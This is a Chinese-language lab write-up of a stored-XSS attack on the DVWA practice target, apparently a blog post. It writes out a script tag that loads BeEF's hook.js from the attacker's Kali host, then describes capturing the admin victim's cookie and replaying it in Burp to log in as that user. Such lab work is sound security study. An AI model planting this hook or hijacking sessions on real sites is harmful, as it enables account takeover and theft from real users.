利用xss漏洞获取cookie并实现远程登录实验

本实验用到的环境为:DVWA靶场

  服务器:winserver 2022 (192.168.25.156)

  攻击机:kali

  受害者:win 10

1.

kali攻击机打开beef-xss

恶意代码:

<script src="http://kali的ip:3000/hook.js"></script>

2.

攻击机登录dvwa,打开存在xss漏洞的页面

攻击机登录的账户为smithy

输入恶意代码

注意:这个输入框需要按F12在前端代码中修改最长字符

3.

受害者访问该页面

受害者登录的账户为admin

访问到被注入恶意代码的页面,这时受害者还没有察觉到。

4.

攻击机的beef页面中发现受害者上钩,获得受害者的cookie

5.

访问登录页面192.168.25.156/dvwa/index.php

用burp抓包

用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录

实验结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值